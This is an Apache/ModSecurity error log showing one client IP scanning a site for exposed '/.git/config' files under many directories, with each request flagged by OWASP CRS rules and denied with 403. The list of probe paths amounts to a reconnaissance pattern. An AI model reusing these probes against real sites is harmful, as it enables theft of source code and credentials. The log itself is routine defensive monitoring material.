[Thu May 23 21:50:58.948156 2024] [:error] [pid 3413210] [client 104.234.204.32:45832] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /scripts/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/scripts/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtSQAAAAA"]
[Thu May 23 21:50:58.948697 2024] [:error] [pid 3413210] [client 104.234.204.32:45832] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/scripts/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtSQAAAAA"]
[Thu May 23 21:50:58.949107 2024] [:error] [pid 3413210] [client 104.234.204.32:45832] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/scripts/.git/config"] [unique_id "Zk-eImikoYj9w0kALAhtSQAAAAA"]
[Thu May 23 21:50:58.951699 2024] [:error] [pid 3431459] [client 104.234.204.32:45884] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /static/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/static/.git/config"] [unique_id "Zk-eIqMCX2cQI6F9CPFGJAAAAAs"]
[Thu May 23 21:50:58.952189 2024] [:error] [pid 3431459] [client 104.234.204.32:45884] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/static/.git/config"] [unique_id "Zk-eIqMCX2cQI6F9CPFGJAAAAAs"]
[Thu May 23 21:50:58.952705 2024] [:error] [pid 3431459] [client 104.234.204.32:45884] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/static/.git/config"] [unique_id "Zk-eIqMCX2cQI6F9CPFGJAAAAAs"]
[Thu May 23 21:50:58.955417 2024] [:error] [pid 3431458] [client 104.234.204.32:45898] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /store/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/store/.git/config"] [unique_id "Zk-eIsZCjO8xFVbueecAnAAAAAo"]
[Thu May 23 21:50:58.955655 2024] [:error] [pid 3431458] [client 104.234.204.32:45898] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/store/.git/config"] [unique_id "Zk-eIsZCjO8xFVbueecAnAAAAAo"]
[Thu May 23 21:50:58.955844 2024] [:error] [pid 3431458] [client 104.234.204.32:45898] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/store/.git/config"] [unique_id "Zk-eIsZCjO8xFVbueecAnAAAAAo"]
[Thu May 23 21:50:59.013404 2024] [:error] [pid 3413211] [client 104.234.204.32:45906] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /templates/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/templates/.git/config"] [unique_id "Zk-eI_WGyBPySR9VLpy1lwAAAAE"]
[Thu May 23 21:50:59.014017 2024] [:error] [pid 3413211] [client 104.234.204.32:45906] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/templates/.git/config"] [unique_id "Zk-eI_WGyBPySR9VLpy1lwAAAAE"]
[Thu May 23 21:50:59.014416 2024] [:error] [pid 3413211] [client 104.234.204.32:45906] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/templates/.git/config"] [unique_id "Zk-eI_WGyBPySR9VLpy1lwAAAAE"]
[Thu May 23 21:50:59.015582 2024] [:error] [pid 3413433] [client 104.234.204.32:45920] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /test/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "Zk-eIzaPQQ881d8bAu5nRwAAAAY"]
[Thu May 23 21:50:59.015967 2024] [:error] [pid 3413433] [client 104.234.204.32:45920] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "Zk-eIzaPQQ881d8bAu5nRwAAAAY"]
[Thu May 23 21:50:59.016190 2024] [:error] [pid 3413433] [client 104.234.204.32:45920] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/test/.git/config"] [unique_id "Zk-eIzaPQQ881d8bAu5nRwAAAAY"]
[Thu May 23 21:50:59.036560 2024] [:error] [pid 3431457] [client 104.234.204.32:45922] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /tests/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/tests/.git/config"] [unique_id "Zk-eI8DLXjxS3Q8qbGS2lAAAAAk"]
[Thu May 23 21:50:59.037087 2024] [:error] [pid 3431457] [client 104.234.204.32:45922] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/tests/.git/config"] [unique_id "Zk-eI8DLXjxS3Q8qbGS2lAAAAAk"]
[Thu May 23 21:50:59.037485 2024] [:error] [pid 3431457] [client 104.234.204.32:45922] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/tests/.git/config"] [unique_id "Zk-eI8DLXjxS3Q8qbGS2lAAAAAk"]
[Thu May 23 21:50:59.040449 2024] [authz_core:error] [pid 3414898] [client 104.234.204.32:45966] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/vendor/.git
[Thu May 23 21:50:59.043733 2024] [:error] [pid 3414863] [client 104.234.204.32:45972] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /web/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "Zk-eI7lcUE7FzAkWB0OTsgAAAAc"]
[Thu May 23 21:50:59.044238 2024] [:error] [pid 3414863] [client 104.234.204.32:45972] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "Zk-eI7lcUE7FzAkWB0OTsgAAAAc"]
[Thu May 23 21:50:59.044649 2024] [:error] [pid 3414863] [client 104.234.204.32:45972] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/web/.git/config"] [unique_id "Zk-eI7lcUE7FzAkWB0OTsgAAAAc"]
[Thu May 23 21:50:59.059338 2024] [authz_core:error] [pid 3413215] [client 104.234.204.32:45952] AH01630: client denied by server configuration: /var/www/magento.test.indacotrentino.com/www/var/.git
[Thu May 23 21:50:59.059353 2024] [:error] [pid 3413214] [client 104.234.204.32:45932] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/themes/.git/config"] [unique_id "Zk-eI5zctTAUN3VLWY6UGgAAAAQ"]
[Thu May 23 21:50:59.059655 2024] [:error] [pid 3413214] [client 104.234.204.32:45932] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/themes/.git/config"] [unique_id "Zk-eI5zctTAUN3VLWY6UGgAAAAQ"]
[Thu May 23 21:50:59.059875 2024] [:error] [pid 3413214] [client 104.234.204.32:45932] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/themes/.git/config"] [unique_id "Zk-eI5zctTAUN3VLWY6UGgAAAAQ"]
[Thu May 23 21:50:59.128295 2024] [:error] [pid 3413213] [client 104.234.204.32:45946] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /uploads/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.git/config"] [unique_id "Zk-eI0Rtqfe68Tkm9lTptwAAAAM"]
[Thu May 23 21:50:59.128924 2024] [:error] [pid 3413213] [client 104.234.204.32:45946] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.git/config"] [unique_id "Zk-eI0Rtqfe68Tkm9lTptwAAAAM"]
[Thu May 23 21:50:59.129339 2024] [:error] [pid 3413213] [client 104.234.204.32:45946] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/uploads/.git/config"] [unique_id "Zk-eI0Rtqfe68Tkm9lTptwAAAAM"]
[Thu May 23 21:50:59.161571 2024] [:error] [pid 3413212] [client 104.234.204.32:45974] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /website/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/website/.git/config"] [unique_id "Zk-eI_kOOvNcESBtKtopEwAAAAI"]
[Thu May 23 21:50:59.162122 2024] [:error] [pid 3413212] [client 104.234.204.32:45974] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/website/.git/config"] [unique_id "Zk-eI_kOOvNcESBtKtopEwAAAAI"]
[Thu May 23 21:50:59.162510 2024] [:error] [pid 3413212] [client 104.234.204.32:45974] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/website/.git/config"] [unique_id "Zk-eI_kOOvNcESBtKtopEwAAAAI"]
[Thu May 23 21:50:59.172256 2024] [:error] [pid 3431459] [client 104.234.204.32:45998] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "Zk-eI6MCX2cQI6F9CPFGJQAAAAs"]
[Thu May 23 21:50:59.172422 2024] [:error] [pid 3413210] [client 104.234.204.32:45986] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wiki/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wiki/.git/config"] [unique_id "Zk-eI2ikoYj9w0kALAhtSgAAAAA"]
[Thu May 23 21:50:59.172654 2024] [:error] [pid 3431459] [client 104.234.204.32:45998] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "Zk-eI6MCX2cQI6F9CPFGJQAAAAs"]
[Thu May 23 21:50:59.172835 2024] [:error] [pid 3413210] [client 104.234.204.32:45986] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wiki/.git/config"] [unique_id "Zk-eI2ikoYj9w0kALAhtSgAAAAA"]
[Thu May 23 21:50:59.172951 2024] [:error] [pid 3431459] [client 104.234.204.32:45998] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/.git/config"] [unique_id "Zk-eI6MCX2cQI6F9CPFGJQAAAAs"]
[Thu May 23 21:50:59.173152 2024] [:error] [pid 3413210] [client 104.234.204.32:45986] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wiki/.git/config"] [unique_id "Zk-eI2ikoYj9w0kALAhtSgAAAAA"]
[Thu May 23 21:50:59.174822 2024] [:error] [pid 3431458] [client 104.234.204.32:46000] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/plugins/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zk-eI8ZCjO8xFVbueecAnQAAAAo"]
[Thu May 23 21:50:59.175146 2024] [:error] [pid 3431458] [client 104.234.204.32:46000] [client 104.234.204.32] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zk-eI8ZCjO8xFVbueecAnQAAAAo"]
[Thu May 23 21:50:59.175432 2024] [:error] [pid 3431458] [client 104.234.204.32:46000] [client 104.234.204.32] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/plugins/.git/config"] [unique_id "Zk-eI8ZCjO8xFVbueecAnQAAAAo"]
[Thu May 23 21:50:59.229848 2024] [:error] [pid 3413211] [client 104.234.204.32:46010] [client 104.234.204.32] ModSecurity: Warning. Matched phrase "/.git/" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.git/ found within REQUEST_FILENAME: /wp-content/themes/.git/config"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "economiasolidale.38121.it"] [uri "/wp-content/themes/.git/config"] [unique_id "Zk-eI_WGyBPySR9VLpy1mAAAAAE"]
